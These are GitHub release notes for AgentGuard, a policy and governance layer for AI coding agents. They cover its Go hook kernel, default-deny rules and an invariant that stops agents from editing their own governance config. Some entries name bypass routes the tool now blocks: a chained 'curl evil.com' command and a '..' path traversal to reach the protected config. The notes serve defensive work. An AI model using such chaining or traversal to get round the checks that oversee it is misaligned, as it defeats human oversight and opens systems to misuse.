Releases: AgentGuardHQ/agentguard
v2.10.3
Fixed
- no-governance-self-modification invariant scoped to config only (#1351) — operational state paths (roadmaps, squads, queue, persona, metrics, identity) are now writable. Only actual governance config (agentguard.yaml, policies/) remains protected.
- Path traversal protection — paths like `.agentguard/squads/../agentguard.yaml` are now normalized before matching, preventing bypass of governance protection via `..` traversal.
- Heredoc false positive fix (Go kernel) — heredoc body content no longer triggers governance path scanning. Only the command header line is checked.
- `gh` command false positive fix (Go kernel) — `gh` CLI commands (GitHub API calls) are now correctly identified even when wrapped with `rtk`, `npx`, `sudo`, etc.
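The path traversal fix above, sketched as an added example (not AgentGuard's own code): the same write targets are checked once against the raw string and once after normalization. The function names, the exempt prefixes and the assumption that governance config sits at the repo root or under `.agentguard/` are illustrative.

```go
package main

import (
	"fmt"
	"path"
	"strings"
)

// Assumed layout for this example, following the release notes: squad and
// queue state is writable, agentguard.yaml and policies/ are governance config.
var operationalPrefixes = []string{".agentguard/squads/", ".agentguard/queue/"}

// matchesGovernance reports whether p names governance config.
func matchesGovernance(p string) bool {
	p = strings.TrimPrefix(p, ".agentguard/")
	return p == "agentguard.yaml" || p == "policies" || strings.HasPrefix(p, "policies/")
}

// naiveViolates matches the operational exemption against the raw string,
// so a ".." segment after an exempt prefix is never resolved.
func naiveViolates(target string) bool {
	for _, pre := range operationalPrefixes {
		if strings.HasPrefix(target, pre) {
			return false
		}
	}
	return matchesGovernance(target)
}

// violates normalizes separators and dot segments first, then matches.
func violates(target string) bool {
	clean := path.Clean(strings.ReplaceAll(target, "\\", "/"))
	for _, pre := range operationalPrefixes {
		if strings.HasPrefix(clean, pre) {
			return false
		}
	}
	return matchesGovernance(clean)
}

func main() {
	// Constructed sample write targets.
	for _, t := range []string{
		".agentguard/squads/alpha.json",
		".agentguard/squads/../agentguard.yaml",
		".agentguard//policies/./deny.yaml",
	} {
		fmt.Printf("%-40s naive=%v normalized=%v\n", t, naiveViolates(t), violates(t))
	}
}
```

`path.Clean` is purely lexical: a symlink under an exempt directory that points at governance config still needs a resolved-path check (for example `filepath.EvalSymlinks`) before matching.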
Impact
This release unblocks ~50% of swarm agents that were being falsely denied by the overly broad self-modification invariant. EMs can now write squad state, roadmap sync works, analytics agents can write state, and commands mentioning .agentguard/ paths in heredoc content are no longer blocked.
Full Changelog: v2.10.2...v2.10.3
v2.10.2 — Unified main branch
Main/master sync complete. Deepagents removed. Rust CI removed. Master branch deleted.
v2.10.1 — Cold-Start DX Fix
Postinstall creates default identity + dirs. Wrapper preserves stdin. CI ships Go binaries.
v2.10.0 — Go Kernel Complete
Go Kernel — Full TS Hook Parity (145x faster)
The Go kernel now handles all Claude Code hook events with complete feature parity, replacing the TypeScript hook pipeline entirely.
What's new
- `FromStdin()` support — Go binary reads Claude Code's stdin JSON payloads natively (root cause fix: the Go fast-path was never executing because it only read env vars that Claude Code doesn't set)
- Enforcement mode routing — `enforce`, `guide`, `educate`, `monitor` modes from policy `mode:` field
- Read-only tool fail-open — Read/Glob/Grep/LS/WebSearch/WebFetch bypass default-deny
- Invariant checking — 22 built-in invariants evaluated in Go
- Session state — format/test pass tracking, written file tracking, retry counters
- Agent identity wizard — blocks with setup prompt when `.agentguard-identity` is missing
- Lesson capture — educate mode records denials for agent learning
- Cloud telemetry — async event sending to AgentGuard dashboard
- PostToolUse — bash error reporting, format/test pass detection, PR creation detection
- Stop/Notification — session viewer generation, live viewer spawn
- Wildcard policy matching — `action: "*"` and `git.*` namespace patterns
Performance
- 2ms Go kernel vs 290ms TypeScript — 145x faster hook evaluation
- TS fallback removed from the hook wrapper
Breaking changes
None. The Go kernel is a drop-in replacement. Existing policies and configurations work unchanged.
Bootstrap fix (#995)
Shared bootstrap.ts module with command-chaining protection across all 4 drivers (Claude, Copilot, Codex, Gemini). Prevents bypasses like pnpm install && curl evil.com.
4-driver postinstall (#1281)
postinstall now detects and configures all 4 AI coding drivers (Claude Code, Copilot CLI, Codex CLI, Gemini CLI).
v2.9.3
What's Changed
Features
- feat: shared binary resolver — all init commands (claude-init, copilot-init, goose-init, deepagents-init) now use identical binary resolution logic. Fixes broken hooks when cwd is a subrepo. (#1283)
- feat: goose-init — new `agentguard goose-init` command for Block's Goose CLI integration via MCP extension (#1283)
- feat: unknown command warn+audit — Option A default-deny for conference demo. Unknown shell.exec commands emit `UnknownCommandWarn` event (allowed, not blocked) for cloud dashboard telemetry. (#1279, closes agentguard-workspace#179)
Bug Fixes
- fix: governance self-modification — skip command scan for `gh` commands in no-governance-self-modification invariant (#1280)
Full Changelog
v2.9.2
What's Changed
Bug Fixes
- fix(matchers): safe-subshell allowlist — prevent `$(date)`, `$(whoami)`, `$(hostname)` and 6 other read-only subshell families from triggering false-positive command scanner denials. Eliminates ~700 false-positive governance denials/day. 20 new tests, ReDoS-safe patterns. (#1274, closes #1139)
Tests
- test(cli): studio wizard coverage — agentguard init studio interactive wizard test coverage (#1268)
Full Changelog
v2.9.1
Bug Fixes
- fix(policy): Wildcard action rule `"*"` now correctly matches all action types including `shell.exec` when `defaultDeny` is enabled (#1253)
  - Root cause: `authorizeIntent()` in AAB denied destructive commands before the policy evaluator ran, bypassing wildcard allow rules
  - Also fixed Go fast-path evaluator to support namespace wildcards (`git.*` matches `git.push`)
What's Changed
This patch fixes a regression where agent squads were blocked from running shell commands even when the policy had an explicit catch-all allow rule. The analytics squad was 100% dark for 24h+ due to this bug.
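How `"*"` and `git.*` patterns interact with `defaultDeny`, as an added example that is not the project's evaluator: the `Rule` shape, the deny-overrides-allow ordering and the function names are assumptions made for illustration.

```go
package main

import (
	"fmt"
	"strings"
)

// Rule is a simplified policy rule (assumed shape for this example).
type Rule struct {
	Action string // exact name, "*", or a namespace pattern such as "git.*"
	Effect string // "allow" or "deny"
}

// matchAction implements the two wildcard forms named in the release notes.
func matchAction(pattern, action string) bool {
	switch {
	case pattern == "*":
		return true
	case strings.HasSuffix(pattern, ".*"):
		// Keep the trailing dot so "git.*" matches "git.push" but not "github.push".
		return strings.HasPrefix(action, strings.TrimSuffix(pattern, "*"))
	default:
		return pattern == action
	}
}

// evaluate applies every matching rule; an explicit deny wins over any allow
// (assumed ordering), and defaultDeny decides when nothing matches.
func evaluate(rules []Rule, action string, defaultDeny bool) string {
	allowed := false
	for _, r := range rules {
		if !matchAction(r.Action, action) {
			continue
		}
		if r.Effect == "deny" {
			return "deny"
		}
		allowed = true
	}
	if allowed || !defaultDeny {
		return "allow"
	}
	return "deny"
}

func main() {
	// Constructed policy: catch-all allow plus a namespace deny.
	rules := []Rule{{"*", "allow"}, {"git.*", "deny"}}
	for _, a := range []string{"shell.exec", "git.push", "github.push"} {
		fmt.Println(a, "->", evaluate(rules, a, true))
	}
}
```

A catch-all `"*"` allow makes `defaultDeny` unreachable for every action that no deny rule names, so reviews of such a policy should focus on the deny list.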
Full Changelog: v2.9.0...v2.9.1
v2.9.0 — Go kernel fast-path: 3ms policy evaluation
Go evaluator wildcard fix unblocks 3ms fast-path. 26-100x faster hook evaluation.
v2.8.5 — Copilot report_intent fix + governance self-mod scoping
Fixes
Copilot report_intent default-deny (#1206)
Added agent.report_intent and agent.internal to the default policy allow list. Without this, Copilot CLI's internal report_intent tool hit default-deny, blocking all 46 Copilot agents.
Governance self-modification invariant scoping (#1201)
Operational state files under .agentguard/ are now exempt from the governance self-modification invariant:
- `.agentguard/squads/` (EM squad state)
- `.agentguard/director-brief*` (director brief)
- `.agentguard/persona.env` (agent identity)
- `.agentguard/agent-reliability*`, `swarm-state*`, `budget-config*`
These are runtime state files, not governance policy. Blocking them prevented EMs from updating squad state and broke the director brief flow.
v2.8.4 — Idempotent hooks + workspace-resolved paths
Fixes
claude-init: idempotent hooks (#1163)
Running agentguard claude-init multiple times no longer duplicates hook entries. Hooks are now assigned (overwrite) instead of appended.
claude-init: workspace-resolved paths
PostToolUse, Notification, and Stop hooks now resolve the AgentGuard binary from AGENTGUARD_WORKSPACE via git common-dir, matching the PreToolUse wrapper pattern. Fixes 'No such file or directory' errors when Claude Code CWD changes (worktrees, nested repos).
Run agentguard claude-init --refresh to regenerate clean hooks.